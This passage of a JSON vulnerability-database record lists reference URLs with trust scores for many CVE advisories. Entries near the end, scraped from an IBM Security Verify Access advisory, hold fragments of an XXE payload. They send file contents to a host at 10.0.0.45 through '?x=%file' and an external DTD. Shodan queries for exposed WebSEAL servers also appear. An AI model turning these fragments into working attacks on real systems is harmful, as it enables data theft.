        "url": "https://access.redhat.com/security/cve/cve-2022-42898"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22629"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26717"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-32208"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26719"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-2509"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26709"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26700"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-27405"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26710"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-1304"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-27404"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-32206"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22628"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-3515"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/78.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/backloop-biz/vulnerability_checker"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-319-01"
      },
      {
        "trust": 0.1,
        "url": "https://alas.aws.amazon.com/alas-2022-1626.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25314"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27782"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27776"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0670"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22576"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/5.2/html-single/release_notes/index"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/1548993"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25313"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27774"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0670"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-25314"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-40528"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2789521"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21673"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21673"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-25313"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29824"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6024"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/openssl"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0759"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32250"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21698"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1012"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0759"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:6051"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-21698"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2023:0408"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30632"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30698"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30629"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23772"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28131"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0391"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29526"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0256"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30633"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23773"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30630"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24795"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1962"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30635"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-3787"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44716"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25308"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25309"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30699"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25310"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32148"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23806"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1798"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0934"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-0308"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-20107"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44717"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8913"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=5.7"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8841"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-40303"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-31813"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42915"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28615"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22721"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-35252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28614"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28330"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26377"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-40304"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23943"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-30522"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-32221"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-6457-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nodejs/12.22.9~dfsg-1ubuntu3.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0778"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36516"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-24448"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8889"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21618"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0168"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21628"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0617"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0924"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0562"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2639"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0908"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1055"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0865"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-26373"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-20368"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1048"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3640"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0561"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0617"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-39399"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0562"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0854"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-29581"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1016"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2078"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-22844"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2938"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21499"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-36946"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42003"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0865"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36558"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0909"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1852"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0561"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0854"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0168"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21626"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28390"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36558"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36518"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-27950"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-2586"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-23960"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3640"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-30002"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36518"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-0891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1184"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-25255"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-21619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-42004"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-1355"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-36516"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-28893"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/advisories/2024-ibmsecurity.txt"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/oauth/oauth20/authorize?client_id=testauthenticatorclient\u0026response_type=code\u0026scope=mmfaauthn\""
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/2001/xmlschema\""
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jbeder/yaml-cpp/pull/807."
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/client9/libinjection/issues/124."
      },
      {
        "trust": 0.1,
        "url": "https://dsc-02.test.lan:8443/"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416#issuecomment-2032110397."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-30997"
      },
      {
        "trust": 0.1,
        "url": "https://www.digicert.com,"
      },
      {
        "trust": 0.1,
        "url": "https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html`."
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/?x=%file`,"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/`)."
      },
      {
        "trust": 0.1,
        "url": "https://internet-faced-website/mga/sps/mmfa/user/mgmt/details"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=testauthenticatorclient\u0026code=0nxkrywnfzkcoa5wftzqdk5mkjpv9y`"
      },
      {
        "trust": 0.1,
        "url": "https://127.0.0.1:$port"
      },
      {
        "trust": 0.1,
        "url": "http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/soap-env:body\u003e\u003c/soap-env:envelope\u003e\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7106586"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38370"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7155356:"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b,"
      },
      {
        "trust": 0.1,
        "url": "https://www.zlib.org)"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime,"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-31006"
      },
      {
        "trust": 0.1,
        "url": "https://info.domain.tld/mga/sps/authsvc?policyid=urn:ibm:security:authentication:asf:qrcode_response\""
      },
      {
        "trust": 0.1,
        "url": "https://repo.symas.com/repo/rpm/sofl/rhel8"
      },
      {
        "trust": 0.1,
        "url": "https://enroll-url/mga/sps/mmfa/user/mgmt/details`"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-31004"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.shodan.io/search?query=cp%3d%22non+cur+otpi+our+nor+uni%22,"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/ssprek_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/."
      },
      {
        "trust": 0.1,
        "url": "https://www.shodan.io/search?query=http.favicon.hash%3a-2069014068,"
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/2001/xmlschema-instance\"\u003e\u003csoap-env:body\u003e\u003cns1:ping"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7158790:"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7106586:"
      },
      {
        "trust": 0.1,
        "url": "http://mirror.centos.org/centos/8-stream/appstream/x86_64/os"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-32329"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38267"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org),"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jbeder/yaml-cpp/pull/807"
      },
      {
        "trust": 0.1,
        "url": "https://info.domain.tld/scim/me\","
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/2001/x"
      },
      {
        "trust": 0.1,
        "url": "http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e\u0026xxe;\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/soap-env:body\u003e\u003c/soap-env:envelope\u003e\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430."
      },
      {
        "trust": 0.1,
        "url": "https://dsc.test.lan:8443/dsess/services/dsess"
      },
      {
        "trust": 0.1,
        "url": "https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=testauthenticatorclient\u0026code=0nxkrywnfzkcoa5wftzqdk5mkjpv9y"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-30998"
      },
      {
        "trust": 0.1,
        "url": "https://dsc-02.test.lan:8443"
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/2001/xmlschema-instance\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://repo.symas.com/repo/gpg/rpm-gpg-key-symas-com-signing-key"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7106586,"
      },
      {
        "trust": 0.1,
        "url": "https://repo.symas.com/configs/sofl/rhel8/sofl.repo"
      },
      {
        "trust": 0.1,
        "url": "http://www.chambersign.org,o=ac"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html`."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38368"
      },
      {
        "trust": 0.1,
        "url": "https://xerces.apache.org/xerces-c/secadv.html)."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-31001"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access"
      },
      {
        "trust": 0.1,
        "url": "https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33\u0026arch=x86_64"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jbeder/yaml-cpp."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7145400:"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-31005"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-32328"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38371),"
      },
      {
        "trust": 0.1,
        "url": "http://mirror.centos.org/centos/8-stream/appstream/x86_64/os/packages/"
      },
      {
        "trust": 0.1,
        "url": "https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/spiderlabs/modsecurity/issues/1412)"
      },
      {
        "trust": 0.1,
        "url": "https://info.domain.tld/scim/me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:mmfa:transaction:transactionspending,urn:ietf:params:scim:schemas:extension:isam:1.0:mmfa:transaction:attributespending\","
      },
      {
        "trust": 0.1,
        "url": "http://schemas.xmlsoap.org/soap/envelope/\""
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/?x=%file;\u0027\u003e\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://repo.symas.com/configs/sofl/rhel8/sofl.repo`:"
      },
      {
        "trust": 0.1,
        "url": "https://dsc-02.test.lan:8443/dsess/services/dsess"
      },
      {
        "trust": 0.1,
        "url": "https://mirrors.fedoraproject.org/metalink?repo=fedora-33\u0026arch=x86_64"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416"
      },
      {
        "trust": 0.1,
        "url": "https://url/sps/mga/user/mgmt/html/device/device_selection.html`"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-32330"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mga/user/mgmt/grant"
      },
      {
        "trust": 0.1,
        "url": "https://curl.haxx.se/docs/sslcerts.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/ibm-security/ibmsecurity/issues/416."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7145400"
      },
      {
        "trust": 0.1,
        "url": "http://mirror.centos.org/centos/8-stream/baseos/x86_64/os"
      },
      {
        "trust": 0.1,
        "url": "https://www.digicert.com,o=digicert"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/6989653."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;"
      },
      {
        "trust": 0.1,
        "url": "http://sms.am.tivoli.com\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1410277"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7155356"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;"
      },
      {
        "trust": 0.1,
        "url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5818)."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications"
      },
      {
        "trust": 0.1,
        "url": "https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en)"
      },
      {
        "trust": 0.1,
        "url": "https://www.shodan.io/search?query=webseal,"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7145400."
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/support/pages/node/7155356."
      },
      {
        "trust": 0.1,
        "url": "https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/dtd.xml\"\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://10.0.0.45/dtd.xml`,"
      },
      {
        "trust": 0.1,
        "url": "https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.ibm.com/docs/en/sva/10.0.7,"
      },
      {
        "trust": 0.1,
